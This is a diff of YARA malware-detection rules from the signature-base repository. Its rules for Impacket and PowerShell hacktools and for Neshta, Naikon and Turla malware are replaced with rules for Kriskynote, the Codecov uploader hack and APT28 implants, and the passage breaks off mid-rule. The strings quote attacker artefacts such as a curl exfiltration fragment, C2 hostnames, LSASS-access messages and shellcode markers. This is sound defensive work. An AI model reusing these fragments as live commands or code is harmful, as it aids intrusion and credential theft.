-		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and $s1 and ( $opa1 or all of ( $opb* ) )
 }
-rule SIGNATURE_BASE_Impacket_Tools_Psexec : FILE
+rule SIGNATURE_BASE_Kriskynote_Mar17_2 : FILE
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "Detects Kriskynote Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5e8d0964-7e6a-5ff6-b9db-e37f997c3e05"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L375-L390"
+		id = "704baf41-9718-537f-9456-381a9f42fb97"
+		date = "2017-03-03"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_kriskynote.yar#L32-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "922b2adec9c73d36343c0182f72f5a325c93c051a22e3f80236f942287d0738b"
+		logic_hash = "4a1a7c1c75cc64df32d2f055538c5ad15418802733046471520c372a616f1e11"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "27bb10569a872367ba1cfca3cf1c9b428422c82af7ab4c2728f501406461c364"
+		hash1 = "cb9a2f77868b28d98e4f9c1b27b7242fec2f2abbc91bfc21fe0573e472c5dfcb"
 
 	strings:
-		$s1 = "impacket.examples.serviceinstall(" ascii
-		$s2 = "spsexec" fullword ascii
-		$s3 = "impacket.examples.remcomsvc(" ascii
+		$s1 = "fgjfcn8456fgjhfg89653wetwts" fullword ascii
+		$op0 = { 33 c0 80 34 30 03 40 3d e6 21 00 00 72 f4 b8 e6 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and 2 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of them )
 }
-rule SIGNATURE_BASE_Impacket_Tools_Generic_1 : FILE
+rule SIGNATURE_BASE_Kriskynote_Mar17_3 : FILE
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "Detects Kriskynote Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d2ce6426-d165-5569-a992-268f05622653"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L392-L427"
+		id = "647fac4c-2326-5a68-9890-8236022c1548"
+		date = "2017-03-03"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_kriskynote.yar#L48-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a66953ca6a99a7880d757a754bb3010aa394de73292975a3741ec5cf1f20385d"
+		logic_hash = "fda8a7944cdd12cadb1c902664909a8164835f660e6fa56209bc51164a90e77c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "4f7fad0676d3c3d2d89e8d4e74b6ec40af731b1ddf5499a0b81fc3b1cd797ee3"
-		hash2 = "d256d1e05695d62a86d9e76830fcbb856ba7bd578165a561edd43b9f7fdb18a3"
-		hash3 = "2d8d500bcb3ffd22ddd8bd68b5b2ce935c958304f03729442a20a28b2c0328c1"
-		hash4 = "ab909f8082c2d04f73d8be8f4c2640a5582294306dffdcc85e83a39d20c49ed6"
-		hash5 = "e2205539f29972d4e2a83eabf92af18dd406c9be97f70661c336ddf5eb496742"
-		hash6 = "27bb10569a872367ba1cfca3cf1c9b428422c82af7ab4c2728f501406461c364"
-		hash7 = "dc85a3944fcb8cc0991be100859c4e1bf84062f7428c4dc27c71e08d88383c98"
-		hash8 = "0f7f0d8afb230c31fe6cf349c4012b430fc3d6722289938f7e33ea15b2996e1b"
-		hash9 = "21d85b36197db47b94b0f4995d07b040a0455ebbe6d413bc33d926ee4e0315d9"
-		hash10 = "4c2921702d18e0874b57638433474e54719ee6dfa39d323839d216952c5c834a"
-		hash11 = "47afa5fd954190df825924c55112e65fd8ed0f7e1d6fd403ede5209623534d7d"
-		hash12 = "7d715217e23a471d42d95c624179fe7de085af5670171d212b7b798ed9bf07c2"
-		hash13 = "9706eb99e48e445ac4240b5acb2efd49468a800913e70e40b25c2bf80d6be35f"
-		hash14 = "d2856e98011541883e5b335cb46b713b1a6b2c414966a9de122ee7fb226aa7f7"
-		hash15 = "8ab2b60aadf97e921e3a9df5cf1c135fbc851cb66d09b1043eaaa1dc01b9a699"
-		hash16 = "efff15e1815fb3c156678417d6037ddf4b711a3122c9b5bc2ca8dc97165d3769"
-		hash17 = "e300339058a885475f5952fb4e9faaa09bb6eac26757443017b281c46b03108b"
-		hash18 = "19544863758341fe7276c59d85f4aa17094045621ca9c98f8a9e7307c290bad4"
-		hash19 = "2527fff1a3c780f6a757f13a8912278a417aea84295af1abfa4666572bbbf086"
-		hash20 = "202a1d149be35d96e491b0b65516f631f3486215f78526160cf262d8ae179094"
+		hash1 = "fc838e07834994f25b3b271611e1014b3593278f0703a4a985fb4234936df492"
 
 	strings:
-		$s1 = "bpywintypes27.dll" fullword ascii
-		$s2 = "hZFtPC" fullword ascii
-		$s3 = "impacket" ascii
+		$s1 = "rundll32 %s Check" fullword ascii
+		$s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RecentDocs" fullword ascii
+		$s3 = "name=\"IsUserAdmin\"" fullword ascii
+		$s4 = "zok]\\\\\\ZZYYY666564444" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 21000KB and all of ( $s* ) ) or ( all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them )
 }
-rule SIGNATURE_BASE_Impacket_Lateral_Movement : FILE
+rule SIGNATURE_BASE_APT_SH_Codecov_Hack_Apr21_1 : FILE
 {
 	meta:
-		description = "Detects Impacket Network Aktivity for Lateral Movement"
-		author = "Markus Neis"
-		id = "44db234c-ac81-5d21-bc2a-8cfd88807c0d"
-		date = "2018-03-22"
-		modified = "2025-03-29"
-		reference = "https://github.com/CoreSecurity/impacket"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L429-L447"
+		description = "Detects manipulated Codecov bash uploader tool that has been manipulated by an unknown actor during March / April 2021"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b5fb74c4-073e-53af-a207-1672e63c9a64"
+		date = "2021-04-16"
+		modified = "2023-12-05"
+		reference = "https://about.codecov.io/security-update/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_codecov_hack.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6628c27474d5235d5b510a55215762980a5b526b353b740344cb669e8e023e3c"
-		score = 60
+		logic_hash = "1aa7723982a1b675ba6694f1af0eb28e5926b974874580bd727cf33a3f8d893a"
+		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = "impacket.dcerpc.v5.transport(" ascii
-		$s2 = "impacket.smbconnection(" ascii
-		$s3 = "impacket.dcerpc.v5.ndr(" ascii
-		$s4 = "impacket.spnego(" ascii
-		$s5 = "impacket.smb(" ascii
-		$s6 = "impacket.ntlm(" ascii
-		$s7 = "impacket.nmb(" ascii
+		$a1 = "Global report uploading tool for Codecov"
+		$s1 = "curl -sm 0.5 -d"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 14000KB and 2 of them
+		uint16( 0 ) == 0x2123 and filesize < 70KB and all of them
 }
-rule SIGNATURE_BASE_Powershell_Suite_Hacktools_Gen_Strings : FILE
+rule SIGNATURE_BASE_APT28_CHOPSTICK : FILE
 {
 	meta:
-		description = "Detects strings from scripts in the PowerShell-Suite repo"
+		description = "Detects a malware that behaves like CHOPSTICK mentioned in APT28 report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "afccdd99-da83-5fde-9e21-52220ded1e47"
-		date = "2017-12-27"
+		id = "08bc4cc2-1844-5218-bb89-20a3ac70a951"
+		date = "2015-06-02"
 		modified = "2023-12-05"
-		reference = "https://github.com/FuzzySecurity/PowerShell-Suite"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_suite.yar#L2-L46"
+		reference = "https://goo.gl/v3ebal"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt28.yar#L10-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0f14a0665c60e85c0cf508f46130b09e467a16270fcd1aa8d0319e17778d4d75"
-		score = 75
-		quality = 83
+		hash = "f4db2e0881f83f6a2387ecf446fcb4a4c9f99808"
+		logic_hash = "750b2d5157856e0ffd840406eec601ded51ced7ccb20b577f336bbaf32681835"
+		score = 60
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "79071ba5a984ee05903d566130467483c197cbc2537f25c1e3d7ae4772211fe0"
-		hash2 = "db31367410d0a9ffc9ed37f423a4b082639591be7f46aca91f5be261b23212d5"
-		hash3 = "4f51e7676a4d54c1962760ca0ac81beb28008451511af96652c31f4f40e8eb8e"
-		hash4 = "17ac9bb0c46838c65303f42a4a346fcba838ebd5833b875e81dd65c82701d8a8"
-		hash5 = "fa33aef619e620a88ecccb990e71c1e11ce2445f799979d23be2d1ad4321b6c6"
-		hash6 = "5542bd89005819bc4eef8dfc8a158183e5fd7a1438c84da35102588f5813a225"
-		hash7 = "c6a99faeba098eb411f0a9fcb772abac2af438fc155131ebfc93a00e3dcfad50"
-		hash8 = "a8e06ecf5a8c25619ce85f8a23f2416832cabb5592547609cfea8bd7fcfcc93d"
-		hash9 = "6aa5abf58904d347d441ac8852bd64b2bad3b5b03b518bdd06510931a6564d08"
-		hash10 = "5608f25930f99d78804be8c9c39bd33f4f8d14360dd1e4cc88139aa34c27376d"
-		hash11 = "68b6c0b5479ecede3050a2f44f8bb8783a22beeef4a258c4ff00974f5909b714"
-		hash12 = "da25010a22460bbaabff0f7004204aae7d830348e8a4543177b1f3383b2c3100"
 
 	strings:
-		$ = "[!] NtCreateThreadEx failed.." fullword ascii
-		$ = "[?] Executing mmc.." ascii
-		$ = "[!] This method is only supported on 64-bit!" fullword ascii
-		$ = "$LNK = [ShellLink.Shortcut]::FromByteArray($LNKHeader.GetBytes())" fullword ascii
-		$ = "$CallResult = [UACTokenMagic]::TerminateProcess($ShellExecuteInfo.hProcess, 1)" fullword ascii
-		$ = "[!] Unable to open process (as Administrator), this may require SYSTEM access." fullword ascii
-		$ = "[!] Error, NTSTATUS Value: " ascii
-		$ = "[!] UAC artifact: " ascii
-		$ = "[>] Process dump success!" ascii
-		$ = "[!] Process dump failed!" ascii
-		$ = "[+] Eidolon entry point:" fullword ascii
-		$ = "Wait for shellcode to run" fullword ascii
-		$ = "$Command = Read-Host \"`nSMB shell\"" fullword ascii
-		$ = "Use Netapi32::NetSessionEnum to enumerate active sessions on domain joined machines." fullword ascii
-		$ = "Invoke-CreateProcess -Binary C:\\Windows\\System32\\" ascii
-		$ = "[?] Thread belongs to: " ascii
-		$ = "[?] Operating system core count: " ascii
-		$ = "[>] Calling Advapi32::LookupPrivilegeValue --> SeDebugPrivilege" fullword ascii
-		$ = "Calling Advapi32::OpenProcessToken --> LSASS" ascii
-		$ = "[!] Mmm, something went wrong! GetLastError returned:" ascii
-		$ = "if (($FileBytes[0..1] | % {[Char]$_}) -join '' -cne 'MZ')" fullword ascii
+		$s0 = "jhuhugit.tmp" fullword ascii
+		$s8 = "KERNEL32.dll" fullword ascii
+		$s9 = "IsDebuggerPresent" fullword ascii
+		$s10 = "IsProcessorFeaturePresent" fullword ascii
+		$s11 = "TerminateProcess" fullword ascii
+		$s13 = "DeleteFileA" fullword ascii
+		$s15 = "GetProcessHeap" fullword ascii
+		$s16 = "!This program cannot be run in DOS mode." fullword ascii
+		$s17 = "LoadLibraryA" fullword ascii
 
 	condition:
-		filesize < 100KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 722KB and all of them
 }
-rule SIGNATURE_BASE_Powershell_Suite_Eidolon : FILE
+rule SIGNATURE_BASE_APT28_Sourface_Malware1 : FILE
 {
 	meta:
-		description = "Detects PowerShell Suite Eidolon script - file Start-Eidolon.ps1"
+		description = "Detects Malware from APT28 incident - SOURFACE is a downloader that obtains a second-stage backdoor from a C2 server."
 		author = "Florian Roth (Nextron Systems)"
-		id = "5440d8fc-b939-556f-a8a0-ef5feb29e32f"
-		date = "2017-12-27"
+		id = "d4275b8d-384f-58b7-bac5-05fb7db659e2"
+		date = "2015-06-01"
 		modified = "2023-12-05"
-		reference = "https://github.com/FuzzySecurity/PowerShell-Suite"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_suite.yar#L48-L63"
+		reference = "https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt28.yar#L34-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "587a9a8569801e2aa96a6f171705fdc1db5632734b54e5a9eb8282502e1efc63"
-		score = 75
+		logic_hash = "2ec1e5db74b5abe1da0d454b5e901bd808a0be318235f25d713cfdc4aea8d6d7"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "db31367410d0a9ffc9ed37f423a4b082639591be7f46aca91f5be261b23212d5"
+		hash1 = "e2450dffa675c61aa43077b25b12851a910eeeb6"
+		hash2 = "d9c53adce8c35ec3b1e015ec8011078902e6800b"
 
 	strings:
-		$ = "[+] Eidolon entry point:" ascii
-		$ = "C:\\PS> Start-Eidolon -Target C:\\Some\\File.Path -Mimikatz -Verbose" fullword ascii
-		$ = "[Int16]$PEArch = '0x{0}' -f ((($PayloadBytes[($OptOffset+1)..($OptOffset)]) | % {$_.ToString('X2')}) -join '')" fullword ascii
+		$s0 = "coreshell.dll" fullword wide
+		$s1 = "Core Shell Runtime Service" fullword wide
+		$s2 = "\\chkdbg.log" wide
 
 	condition:
-		uint16( 0 ) == 0x7566 and filesize < 13000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 62KB and all of them
 }
-
-rule SIGNATURE_BASE_MAL_Neshta_Generic : HIGHVOL FILE
+rule SIGNATURE_BASE_APT28_Sourface_Malware2 : FILE
 {
 	meta:
-		description = "Detects Neshta malware"
+		description = "Detects Malware from APT28 incident - SOURFACE is a downloader that obtains a second-stage backdoor from a C2 server."
 		author = "Florian Roth (Nextron Systems)"
-		id = "9a3b8369-7e19-5c21-9eba-0bb81507696a"
-		date = "2018-01-15"
-		modified = "2021-04-14"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_netsha.yar#L3-L36"
+		id = "8a9df742-82c1-56bb-ab70-6384403f70b5"
+		date = "2015-06-01"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt28.yar#L52-L72"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "acac6f81900c60a0aacea6345a7c03a0b77dd86d5ca7ca3d102668c49595bb6b"
-		score = 75
+		logic_hash = "ed0424e61ca3243241e32d4f744398d263d7e35de15d94e9c6f816dc7349c267"
+		score = 60
 		quality = 85
-		tags = "HIGHVOL, FILE"
-		hash1 = "27c67eb1378c2fd054c6649f92ec8ee9bfcb6f790224036c974f6c883c46f586"
-		hash1 = "0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e"
-		hash2 = "b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb"
-		hash3 = "1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb"
+		tags = "FILE"
+		super_rule = 1
+		hash0 = "367d40465fd1633c435b966fa9b289188aa444bc"
+		hash1 = "cf3220c867b81949d1ce2b36446642de7894c6dc"
+		hash2 = "ed48ef531d96e8c7360701da1c57e2ff13f12405"
+		hash3 = "682e49efa6d2549147a21993d64291bfa40d815a"
+		hash4 = "a8551397e1f1a2c0148e6eadcb56fa35ee6009ca"
+		hash5 = "f5b3e98c6b5d65807da66d50bd5730d35692174d"
 
 	strings:
-		$x1 = "the best. Fuck off all the rest."
-		$x2 = "! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]" fullword ascii
-		$s1 = "Neshta" ascii fullword
-		$s2 = "Made in Belarus. " ascii fullword
-		$op1 = { 85 c0 93 0f 85 62 ff ff ff 5e 5b 89 ec 5d c2 04 }
-		$op2 = { e8 e5 f1 ff ff 8b c3 e8 c6 ff ff ff 85 c0 75 0c }
-		$op3 = { eb 02 33 db 8b c3 5b c3 53 85 c0 74 15 ff 15 34 }
-		$sop1 = { e8 3c 2a ff ff b8 ff ff ff 7f eb 3e 83 7d 0c 00 }
-		$sop2 = { 2b c7 50 e8 a4 40 ff ff ff b6 88 }
+		$s0 = "coreshell.dll" fullword ascii
+		$s1 = "Applicate" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 1 of ( $x* ) or all of ( $s* ) or 3 of them or pe.imphash ( ) == "9f4693fc0c511135129493f2161d1e86" )
+		uint16( 0 ) == 0x5a4d and filesize < 550KB and all of them
 }
-rule SIGNATURE_BASE_MAL_Backdoor_Naikon_APT_Sample1 : FILE
+rule SIGNATURE_BASE_APT28_Sourface_Malware3 : FILE
 {
 	meta:
-		description = "Detects backdoors related to the Naikon APT"
+		description = "Detects Malware from APT28 incident - SOURFACE is a downloader that obtains a second-stage backdoor from a C2 server."
 		author = "Florian Roth (Nextron Systems)"
-		id = "ba79285b-7c7f-5b19-837e-6696e50a2866"
-		date = "2015-05-14"
-		modified = "2023-01-06"
-		reference = "https://goo.gl/7vHyvh"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_naikon.yar#L2-L36"
+		id = "b49843b9-3a54-5525-958e-ac545cc00bde"
+		date = "2015-06-01"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2014/10/apt28-a-window-into-russias-cyber-espionage-operations.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt28.yar#L74-L98"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d5716c80cba8554eb79eecfb4aa3d99faf0435a1833ec5ef51f528146c758eba"
-		hash = "f5ab8e49c0778fa208baad660fe4fa40fc8a114f5f71614afbd6dcc09625cb96"
-		logic_hash = "e582fc3518dab2392a79909b5369c48656b6f280b915fad4befb0839ec7ce1bd"
-		score = 75
+		logic_hash = "894fc2913cf1fa8aecb3052e762d4403124fcbdb2148edb23a9117c2f2b8eddc"
+		score = 60
 		quality = 85
 		tags = "FILE"
+		super_rule = 1
+		hash0 = "85522190958c82589fa290c0835805f3d9a2f8d6"
+		hash1 = "d9c53adce8c35ec3b1e015ec8011078902e6800b"
+		hash2 = "367d40465fd1633c435b966fa9b289188aa444bc"
+		hash3 = "d87b310aa81ae6254fff27b7d57f76035f544073"
+		hash4 = "cf3220c867b81949d1ce2b36446642de7894c6dc"
+		hash5 = "ed48ef531d96e8c7360701da1c57e2ff13f12405"
+		hash6 = "682e49efa6d2549147a21993d64291bfa40d815a"
+		hash7 = "a8551397e1f1a2c0148e6eadcb56fa35ee6009ca"
+		hash8 = "f5b3e98c6b5d65807da66d50bd5730d35692174d"
+		hash9 = "e2450dffa675c61aa43077b25b12851a910eeeb6"
 
 	strings:
-		$x0 = "GET http://%s:%d/aspxabcdef.asp?%s HTTP/1.1" fullword ascii
-		$x1 = "POST http://%s:%d/aspxabcdefg.asp?%s HTTP/1.1" fullword ascii
-		$x2 = "greensky27.vicp.net" fullword ascii
-		$x3 = "\\tempvxd.vxd.dll" wide
-		$x5 = "otna.vicp.net" fullword ascii
-		$s1 = "User-Agent: webclient" fullword ascii
-		$s2 = "\\User.ini" ascii
-		$s3 = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/200" ascii
-		$s4 = "\\UserProfile.dll" wide
-		$s5 = "Connection:Keep-Alive: %d" fullword ascii
-		$s6 = "Referer: http://%s:%d/" ascii
-		$s7 = "%s %s %s %d %d %d " fullword ascii
-		$s8 = "%s--%s" fullword wide
-		$s9 = "Run File Success!" fullword wide
-		$s10 = "DRIVE_REMOTE" fullword wide
-		$s11 = "ProxyEnable" fullword wide
-		$s12 = "\\cmd.exe" wide
+		$s0 = "coreshell.dll" fullword wide
+		$s1 = "Core Shell Runtime Service" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 7 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 550KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_Nim_Nimpackt : EXE FILE HKTL
+rule SIGNATURE_BASE_APT28_Skinnyboy_Dropper : RUSSIA FILE
 {
 	meta:
-		description = "Detects binaries generated with NimPackt v1"
-		author = "Cas van Cooten"
-		id = "3399d937-133f-5701-840e-eaf68b2f1ec9"
-		date = "2022-01-26"
+		description = "Detects APT28 SkinnyBoy droppers"
+		author = "Cluster25"
+		id = "ed0b2d2b-f820-57b5-9654-c24734d81996"
+		date = "2021-05-24"
 		modified = "2023-12-05"
-		reference = "https://github.com/chvancooten/NimPackt-v1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_nimpackt.yar#L2-L23"
+		reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt28.yar#L103-L118"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2bda7acb440d1c72efeaddcb18b736343d658d59feccf6c9339b313cd35f32eb"
-		score = 80
-		quality = 79
-		tags = "EXE, FILE, HKTL"
+		logic_hash = "9e29ed985fac8701f72f0860fe101272c3c3342ef6857e30d32f5fea14822945"
+		score = 75
+		quality = 85
+		tags = "RUSSIA, FILE"
+		hash1 = "12331809c3e03d84498f428a37a28cf6cbb1dafe98c36463593ad12898c588c9"
 
 	strings:
-		$nim1 = "fatal.nim" ascii fullword
-		$nim2 = "winim" ascii
-		$np1 = { 4E 69 6D 50 61 63 6B 74 }
-		$sus1 = { 61 6D 73 69 00 00 00 00 B8 57 00 07 80 C3 }
-		$sus2 = { 5B 2B 5D 20 49 6E 6A 65 63 74 65 64 }
-		$sus3 = { 5C 2D 2D 20 62 79 74 65 73 20 77 72 69 74 74 65 6E 3A }
+		$ = "cmd /c DEL " ascii
+		$ = {8a 08 40 84 c9 75 f9}
+		$ = {0f b7 84 0d fc fe ff ff 66 31 84 0d fc fd ff ff}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 750KB and 1 of ( $nim* ) and ( $np1 or 2 of ( $sus* ) )
+		( uint16( 0 ) == 0x5A4D and all of them )
 }
-rule SIGNATURE_BASE_Neuron_Common_Strings : FILE
+rule SIGNATURE_BASE_APT28_Skinnyboy_Launcher : RUSSIA FILE
 {
 	meta:
-		description = "Rule for detection of Neuron based on commonly used strings"
-		author = "NCSC UK"
-		id = "168214d4-7436-531e-9c1f-48ca22215a1b"
-		date = "2017-11-23"
+		description = "Detects APT28 SkinnyBoy launchers"
+		author = "Cluster25"
+		id = "eaf4e8e5-cbec-5000-a2ff-31d1dac4c30f"
+		date = "2021-05-24"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/alerts/turla-group-malware"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_neuron.yar#L9-L32"
+		reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt28.yar#L120-L141"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d1d7a96fcadc137e80ad866c838502713db9cdfe59939342b8e3beacf9c7fe29"
-		logic_hash = "5f7a704fa0b6892b40868689c876e2f8252bb7319424212454408cbdf66f0b9f"
+		logic_hash = "cbb7a6e0114a9556a99ab3f5601664f430b650b2de0b44fe0178a99f21082e8d"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = "RUSSIA, FILE"
+		hash1 = "2a652721243f29e82bdf57b565208c59937bbb6af4ab51e7b6ba7ed270ea6bce"
 
 	strings:
-		$strServiceName = "MSExchangeService" ascii
-		$strReqParameter_1 = "cadataKey" wide
-		$strReqParameter_3 = "cadata" wide
-		$strReqParameter_4 = "cadataSig" wide
-		$strEmbeddedKey = "PFJTQUtleVZhbHVlPjxNb2R1bHVzPnZ3WXRKcnNRZjVTcCtWVG9Rb2xuaEVkMHVwWDFrVElFTUNTNEFnRkRCclNm clpKS0owN3BYYjh2b2FxdUtseXF2RzBJcHV0YXhDMVRYazRoeFNrdEpzbHljU3RFaHBUc1l4OVBEcURabVVZVklVb HlwSFN1K3ljWUJWVFdubTZmN0JTNW1pYnM0UWhMZElRbnl1ajFMQyt6TUhwZ0xmdEc2b1d5b0hyd1ZNaz08L01vZH VsdXM+PEV4cG9uZW50PkFRQUI8L0V4cG9uZW50PjwvUlNBS2V5VmFsdWU+" wide
-		$strDefaultKey = "8d963325-01b8-4671-8e82-d0904275ab06" wide
-		$strIdentifier = "MSXEWS" wide
-		$strListenEndpoint = "443/ews/exchange/" wide
-		$strB64RegKeySubstring = "U09GVFdBUkVcTWljcm9zb2Z0XENyeXB0b2dyYXBo" wide
-		$strName = "neuron_service" ascii
-		$dotnetMagic = "BSJB" ascii
+		$sha = {F4 EB 56 52 AF 4B 48 EE 08 FF 9D 44 89 4B D5 66 24 61 2A 15 1D 58 14 F9 6D 97
+      13 2C 6D 07 6F 86}
+		$l1 = "CryptGetHashParam" ascii
+		$l2 = "CryptCreateHash" ascii
+		$l3 = "FindNextFile" ascii
+		$l4 = "PathAddBackslashW" ascii
+		$l5 = "PathRemoveFileSpecW" ascii
+		$h1 = {50 6A 00 6A 00 68 0C 80 00 00 FF ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A 00
+      56 ?? ?? ?? ?? 50 FF ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ??}
+		$h2 = {8B 01 3B 02 75 10 83 C1 04 83 C2 04 83 EE 04 73 EF}
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and $dotnetMagic and 6 of ( $str* )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( $sha or ( all of ( $l* ) and all of ( $h* ) ) )
 }
-rule SIGNATURE_BASE_Nautilus_Forensic_Artificats
+
+rule SIGNATURE_BASE_APT28_Skinnyboy_Implanter : RUSSIA FILE
 {
 	meta:
-		description = "Rule for detection of Nautilus related strings"
-		author = "NCSC UK / Florian Roth"
-		id = "0c0a24da-4dbc-543a-9ec0-a5b1ec75c889"
-		date = "2017-11-23"
+		description = "Detects APT28 SkinnyBoy implanter"
+		author = "Cluster25"
+		id = "c44faf95-a64c-58f4-97d4-2fe17aefc813"
+		date = "2021-05-24"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/alerts/turla-group-malware"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_neuron.yar#L98-L125"
+		reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt28.yar#L143-L159"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "17ae559a4640636f1285c7078a4366954d5a41c098419db32315e354f0ae619d"
-		score = 60
